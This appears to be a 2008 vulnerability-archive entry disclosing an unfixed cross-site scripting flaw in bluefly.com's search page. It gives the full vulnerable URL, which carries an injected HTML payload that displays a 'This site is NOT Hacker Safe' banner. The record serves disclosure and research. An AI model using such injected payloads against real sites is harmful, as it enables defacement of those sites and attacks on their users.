Unfixed XSS vulnerability at bluefly.com

2008-03-25T00:00:00
ID XSSED:34511
Type xssed
Reporter holisticinfosec
Modified 2008-12-04T00:00:00

Description

Security researcher holisticinfosec, has submitted on 25/03/2008 a cross-site-scripting (XSS) vulnerability affecting bluefly.com, which at the time of submission ranked 7399 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://bluefly.com/pages/search/results.jsp;jsessionid=HobzrIuDooFLT816iLxdtGnDM7WKJS0Yi2cxSAoDccvh1uMrkUyV!-893005850!app19.l3.bluefly.com!7005!7002?cmSrch=true&Ne=500000&Ntk=all&Ntx=mode+matchallpartial&N=933&Ntt=test&FOLDER%3C%3Efolder_id=%22%3E%3Cmarquee%3E%3Ch%31%3EThis_site_is_NOT_Hacker_Safe%3C%2Fh%31%3E%3C%2Fmarquee%3E&inicat=933